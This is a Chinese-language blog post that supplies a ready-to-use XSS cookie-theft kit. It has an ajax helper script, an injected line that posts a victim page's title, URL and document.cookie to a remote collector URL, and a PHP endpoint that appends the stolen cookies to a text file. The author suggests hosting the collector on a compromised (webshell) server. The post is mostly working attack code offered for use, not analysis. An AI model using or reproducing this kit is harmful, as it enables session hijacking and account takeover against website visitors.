一个简单的ajax获取远程cookie js脚本 加 php服务端
前言
e 这个真的挺简单的 就是一个ajax 发送到服务端 ,本文仅是简单脚本,可以随意挂在 如webshell的公网web ,各位同仁可以改为 mysql 数据驱动,加唯一验证什么的,最近勃主正在搞一个像 beef xssf一样的 xss 平台,自带各种payload 和执行自定义脚本,敬请期待吧.
兼容ajax
好像是从jquery 库里面截取出来的 调用和jquery 相似
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| x = window.x || {
request: function() {
if (window.XMLHttpRequest) {
var ajax = new XMLHttpRequest()
} else if (window.ActiveXObject) {
try {
var ajax = new ActiveXObject("Msxml2.XMLHTTP")
} catch(e) {
try {
var ajax = new ActiveXObject("Microsoft.XMLHTTP")
} catch(e) {}
}
}
return ajax
},
handle: function(ajax, callback) {
ajax.onreadystatechange = function() {
if (ajax.readyState == 4) {
if (ajax.status == 200) {
if (callback) allback(ajax.responseText)
}
}
}
},
display: function(o) {
if (typeof(o) == 'object') {
var str = '';
for (a in o) {
str += a + '=' + o[a] + '&'
}
str = str.substr(0, str.length - 1);
return str
} else {
return o
}
},
get: function(url, callback) {
ajax = x.request();
ajax.open('get', url, true);
ajax.send(null);
x.handle(ajax, callback)
},
post: function(url, content, callback) {
ajax = x.request();
ajax.open('post', url, true);
ajax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
content = x.display(content);
ajax.send(content);
x.handle(ajax, callback)
}
}
|
使用时可以 eval压缩一下 体积就小很多了 使用 ajax post
1
| x.post(xingUrl,{title:escape(document.title),url:escape(document.URL),cookie:document.cookie});
|
xingUrl 为远程服务端 这样就可以异步把 网页url title cookie 发送出去鸟
服务端编写
一个最为简单是演示
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
$a=$_GET['a'];
$data="data.txt";
if($a=='xss'){
extract($_POST,EXTR_SKIP);
if(!file_exists($data)) file_put_contents($data,"");
$content="Time :".time()." | Url :".$url." | Cookie :".$cookie;
file_put_contents($data, $content,FILE_APPEND);
}
|
demo 下载
好吧 简单脚本已经实现鸟 勃主几个小时之后还得赶回来家的早车 睡觉鸟 不懂的可以加我q(本博客右边) 猛点击我下载
更新 xss.js 中的 xingUrl 即可
演示
打开 demo中的 test.html look 下面内涵图
